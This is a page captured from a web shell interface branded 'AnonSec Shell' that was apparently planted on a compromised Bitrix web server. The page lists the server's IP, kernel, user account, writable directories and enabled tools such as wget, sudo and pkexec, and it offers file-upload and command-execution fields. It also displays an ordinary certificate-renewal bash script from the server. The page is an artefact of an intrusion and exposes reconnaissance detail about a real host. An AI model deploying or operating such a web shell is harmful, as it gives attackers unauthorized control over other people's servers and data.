AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 3.145.56.6
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/webdir/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /opt/webdir/bin/bx-dehydrated
#!/bin/bash
export LANG=en_US.UTF-8
export NOLOCALE=yes
export PATH=/sbin:/bin:/usr/sbin:/usr/bin

OS_VERSION=$(cat /etc/redhat-release | \
    sed -e "s/CentOS Linux release//;s/CentOS release // " | cut -d'.' -f1 | \
    sed -e "s/\s\+//g")

LOG=/home/bitrix/dehydrated_update.log
CERT_DIR=/home/bitrix/dehydrated/certs

# update certificates
/home/bitrix/dehydrated/dehydrated -c --keep-going > $LOG 2>&1

# delete old certificates
find $CERT_DIR/ -type f -mtime +120 -delete >>$LOG 2>&1

Anon7 - 2022
AnonSec Team